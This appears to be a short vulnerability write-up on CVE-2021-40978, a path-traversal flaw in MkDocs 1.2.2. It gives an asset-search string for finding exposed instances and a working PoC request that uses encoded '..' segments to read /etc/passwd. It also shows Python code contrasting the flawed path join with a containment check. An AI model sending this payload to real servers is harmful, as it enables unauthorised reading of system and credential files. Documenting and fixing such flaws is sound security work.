MkDocs arbitrary file read vulnerability CVE-2021-40978
Vulnerability Description
In MkDocs, directories can be traversed by placing %2e%2e (the URL-encoded form of "..") in the request path, which allows sensitive files to be read.
Vulnerability Impact
MkDocs 1.2.2
Network asset mapping
title="My Docs"
Vulnerability Reproduction
Main page
Verification PoC
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
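Why the encoded path above escapes the document root, and the containment check that stops it, shown as an added example (not MkDocs code and not part of the original post). The function names and the root `/srv/docs/site` are assumptions made for illustration.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed sample inputs: the page's PoC path and an ordinary page request.
POC_PATH = "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
NORMAL_PATH = "/user-guide/index.html"


def resolve_unsafe(root: str, request_path: str) -> str:
    """Flawed pattern: percent-decode, join to the root, never check the result."""
    relative = unquote(request_path).lstrip("/")
    return os.path.normpath(os.path.join(root, relative))


def resolve_safe(root: str, request_path: str) -> Optional[str]:
    """Return the file path only if it stays inside root, otherwise None."""
    root_real = os.path.realpath(root)
    decoded = unquote(request_path)
    if "\x00" in decoded:
        return None  # NUL bytes never belong in a file path
    # realpath collapses ".." segments and follows symlinks before the check.
    candidate = os.path.realpath(os.path.join(root_real, decoded.lstrip("/")))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None  # resolved outside the document root: refuse to serve
    return candidate


if __name__ == "__main__":
    site_root = "/srv/docs/site"  # hypothetical document root
    for path in (NORMAL_PATH, POC_PATH):
        print(path)
        print("  unsafe ->", resolve_unsafe(site_root, path))
        print("  safe   ->", resolve_safe(site_root, path))
```

The check runs on the decoded, fully resolved path, so it does not depend on whether the client sent `..` literally or as `%2e%2e`.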
This post is licensed under CC BY 4.0 by the author.